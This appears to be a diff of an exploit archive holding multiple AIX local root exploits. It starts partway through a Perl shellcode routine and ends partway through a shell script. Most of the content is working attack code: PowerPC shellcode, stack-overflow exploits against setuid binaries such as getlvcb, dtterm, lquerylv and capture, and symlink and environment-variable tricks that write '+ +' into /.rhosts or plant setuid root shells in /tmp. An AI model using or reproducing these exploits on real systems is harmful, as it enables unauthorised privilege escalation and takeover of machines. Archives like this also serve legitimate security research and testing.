my $SHELL,($XID,$GID)=@_;
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

177
exploits/aix/local/23841.c Normal file
View file

@ -0,0 +1,177 @@
// source: https://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
/********************************************************************
* Secure Network Operations (http://www.secnetops.com)
* Local AIX getlvcb Exploit
* by: mattox@secnetops.com
* Program Description:
*
* Vulnerability Details:
*
* # gdb -q /usr/sbin/getlvcb
* (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD
* (gdb) r
* Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41424344 in ?? ()
* (gdb) bt
* #0 0x41424344 in ?? ()
* (gdb) i r
* r0 0x6000328e 1610625678
* r1 0x2ff228a0 804399264
* r2 0xf012de88 -267198840
* r3 0x1 1
* r4 0x9 9
* r5 0x2ff22ff8 804401144
* r6 0xd030 53296
* r7 0x0 0
* r8 0x60000000 1610612736
* r9 0x600039ce 1610627534
* r10 0x0 0
* r11 0x6000214a 1610621258
* r12 0x41424344 1094861636
* r13 0x200008b0 536873136
* r14 0x0 0
* r15 0x0 0
* r16 0x0 0
* r17 0x0 0
* r18 0x0 0
* r19 0x0 0
* r20 0x0 0
* r21 0x0 0
* r22 0x0 0
* r23 0x0 0
* r24 0x0 0
* r25 0x0 0
* r26 0x0 0
* r27 0x0 0
* r28 0x41414141 1094795585
* r29 0x41414141 1094795585
* r30 0x41414141 1094795585
* r31 0x41414141 1094795585
* pc 0x41424344 1094861636
* ps 0x4000d030 1073795120
* cr 0x26222444 639771716
* lr 0x41424344 1094861636
* ctr 0x0 0
* xer 0x0 0
* fpscr 0x0 0
* vscr 0x0 0
* vrsave 0x0 0
*
* .............................................................
* $ uname -a
* AIX thunderfoot 1 5 002064864C00
*
* $ whoami
* kinet1k
*
* $ id
* uid=7(kinet1k) gid=1(staff) groups=0(system)
* $ ./r00tme 208 231
*
* Secure Network Operations (written by: mattox@secnetops.com)
* AIX Local getlvncb exploit
*
* Fixin to overwrite the address: 0x2ff2283d
* Using a buffer size of: 208
* And an offset of: 231
*
* # whoami
* root
*
* # id
* uid=0(root) gid=1(staff) groups=0(system)
*..............................................................
*
*********************************************************************/
#include <stdlib.h>
#include <string.h>
#define OFFSET 0
#define BUFFERSIZE 208
#define NOP "\x7c\xa5\x2a\x79"
#define RETURNADDR 0x2ff22924
char shellcode[ ] =
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
"\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
int main( int argc, char *argv[ ] )
{
int i;
int offset = OFFSET, bufferSize = BUFFERSIZE;
unsigned long esp, returnAddress, *addressPointer;
char *buffer, *pointer;
/* Usage */
if( argv[ 1 ] ) {
if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
printf( "\n\tUsage: %s <buffer size> <offset>\n\n", argv[ 0 ] );
exit( 0 );
}
}
if( argc > 1 ) {
bufferSize = atoi( argv[ 1 ] );
}
if( argc > 2 ) {
offset = atoi( argv[ 2 ] );
}
returnAddress = RETURNADDR - offset;
printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
printf( "AIX Local getlvncb exploit\n\n" );
printf( "Fixin to overwrite the address: 0x%x\n", returnAddress );
printf( "Using a buffer size of: %i\n", bufferSize );
printf( "And an offset of: %i\n", offset );
if( !( buffer = malloc( bufferSize ) ) ) {
printf( "Coundn't allocate memory.\n" );
exit( 0 );
}
/* I know, this is weird stuff...had to sub odd number to get ret addy to align */
pointer = buffer - 1;
addressPointer = ( long * )pointer;
for( i = 0; i < bufferSize; i+=4 ) {
*( addressPointer++ ) = returnAddress;
}
for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
buffer[ i ] = ( unsigned long )NOP;
}
pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );
for( i = 0; i < strlen( shellcode ); i++ ) {
*( pointer++ ) = shellcode[ i ];
}
buffer[ bufferSize - 1 ] = '\0';
execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 );
free( buffer );
return 0;
}

43
exploits/aix/local/23883.pl Executable file
View file

@ -0,0 +1,43 @@
source: https://www.securityfocus.com/bid/9982/info
Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges.
This issue may allow a malicious user to corrupt arbitrary files on the affected system, potentially leading to a system wide denial of service condition. It has also been conjectured that this issue may be leveraged to allow an attacker to gain escalated privileges, although this is unconfirmed.
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF

17
exploits/aix/local/25039.txt Normal file
View file

@ -0,0 +1,17 @@
source: https://www.securityfocus.com/bid/12041/info
diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

7
exploits/aix/local/26996.txt Normal file
View file

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/16102/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory

11
exploits/aix/local/26997.txt Normal file
View file

@ -0,0 +1,11 @@
source: https://www.securityfocus.com/bid/16103/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

65
exploits/aix/local/28507.sh Executable file
View file

@ -0,0 +1,65 @@
# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi

185
exploits/aix/local/30399.c Normal file
View file

@ -0,0 +1,185 @@
// source: https://www.securityfocus.com/bid/25075/info
IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions.
/* 07/2007: public release
*
* qaaz@aix:~$ ./aix-capture
* --------------------------------
* AIX capture Local Root Exploit
* By qaaz
* --------------------------------
* bash: no job control in this shell
* bash-3.00#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
ulong addr = get_addr(argv, envp, args, envs);
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}

160
exploits/aix/local/333.c Normal file
View file

@ -0,0 +1,160 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/dt/bin/dtterm";
char prog2[30]="dtterm";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=1000;
char *args[4];
char *arg1="-ms";
char *newenv[8];
int startwith=0;
mn=200;
max=300;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711*/
}
/*-------sometimes this helps-----------------------
#!/bin/ksh
L=20
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
// milw0rm.com [1997-05-27]

161
exploits/aix/local/335.c Normal file
View file

@ -0,0 +1,161 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/lquerylv";
char prog2[30]="lquerylv";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=4600;
char *args[4];
char *arg1="-L";
char *newenv[8];
int startwith=0;
mn=100;
max=280;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}
/*
----------cut here---------
----------sometimes this helps-----------------
#!/bin/ksh
L=100
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 42`
./a.out $L
done */
// milw0rm.com [1997-05-26]

55
exploits/aix/local/33725.txt Normal file
View file

@ -0,0 +1,55 @@
Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown
Details:
It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }
It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

22
exploits/aix/local/38106.txt Normal file
View file

@ -0,0 +1,22 @@
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--

27
exploits/aix/local/38576.sh Executable file
View file

@ -0,0 +1,27 @@
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell

62
exploits/aix/local/40709.sh Executable file
View file

@ -0,0 +1,62 @@
#!/usr/bin/sh
#
# AIX lsmcode local root exploit.
#
# Affected: AIX 6.1/7.1/7.2.0.2
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
if [ ! -x "/usr/sbin/lsmcode" ]; then
echo "[-] lsmcode isn't executable. Exploit failed."
exit 1
fi
echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Exporting variables"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
echo "[*] Setting umask to 000"
umask 000
echo "[*] Executing vulnerable binary [lsmcode]"
/usr/sbin/lsmcode -c >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Preparing escalation"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Cleaning up environment variables"
unset MALLOCBUCKETS MALLOCOPTIONS
echo "[*] Escalating"
